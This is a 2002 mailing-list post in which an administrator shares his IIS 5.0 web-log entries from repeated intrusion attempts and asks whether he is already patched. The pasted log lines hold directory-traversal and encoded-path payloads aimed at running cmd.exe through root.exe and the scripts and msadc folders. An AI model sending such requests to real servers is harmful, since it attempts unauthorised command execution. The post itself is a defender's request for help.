log question

Wed, 03 Jul 2002 13:12:04 -0700 

Over the last few days I have seen the same 15 or so lines appear in my
MS2000 web logs several times.  They are obvious hack attempts.  What I need
to know is whether this is a new exploit or one that I am already patched
against. I have what I believe to be the latest patches from the Microsoft
website.


#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-06-26 04:29:25
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem
cs-uri-query sc-status cs-host cs(User-Agent) cs(Referer)
2002-06-26 04:29:25 66.183.53.160 - 192.168.0.200 80 GET /scripts/root.exe
/c+dir 404 www - -
2002-06-26 04:29:25 66.183.53.160 - 192.168.0.200 80 GET /MSADC/root.exe
/c+dir 403 www - -
2002-06-26 04:29:26 66.183.53.160 - 192.168.0.200 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:26 66.183.53.160 - 192.168.0.200 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 403 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET
/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET
/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 www - -

Anyone know the answer or know where I need to go to find it?

Steve Weitzman
[EMAIL PROTECTED]

Reply via email to